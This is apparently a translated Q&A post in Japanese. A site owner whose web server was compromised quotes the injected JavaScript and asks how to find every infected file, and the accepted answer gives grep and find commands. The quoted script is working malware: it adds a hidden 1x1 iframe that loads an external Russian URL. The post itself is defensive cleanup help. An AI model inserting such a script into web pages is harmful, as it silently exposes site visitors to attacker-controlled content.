私のWebサーバーのウェブサイトが攻撃を受けました:コードの挿入。
マルウェアは次のとおりです。
<script type=\"text/javascript\" language=\"javascript\">
(function () {
var t = document.createElement('iframe');
t.src = 'http://ahtiagge.ru/count27.php';
t.style.position = 'absolute';
t.style.border = '0';
t.style.height = '1px';
t.style.width = '1px';
t.style.left = '1px';
t.style.top = '1px';
if (!document.getElementById('t')) {
document.write('<div id=\'t\'></div>');
document.getElementById('t').appendChild(t);
}
})
();</script>
感染を防ぐために、サーバー上のすべてのファイルの名前(およびパス)を知りたいです。私が一致させたい表現は次のとおりです。 'http://ahtiagge.ru/count27.php'
私は次の結果が欲しい:
/var/www/vhosts/site1.com/httpdocs/index.php
/var/www/vhosts/site1.com/httpdocs/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/fileN.php
/var/www/vhosts/site1.com/httpdocs/one_directory/and_sub/fileN.php
シェルスクリプトを使用してこの問題をどのように解決できますか?可能ですか?
ベストアンサー1
grep同じように使ってもいい
grep -RP "http:\/\/ahtiagge.ru\/count27\.php" /var/www/vhosts/
または、次のコマンドを使用して *.php ファイルをチェックインします。find
find /var/www/vhosts/ -name "*.php" -print | xargs grep -P "http:\/\/ahtiagge.ru\/count27\.php"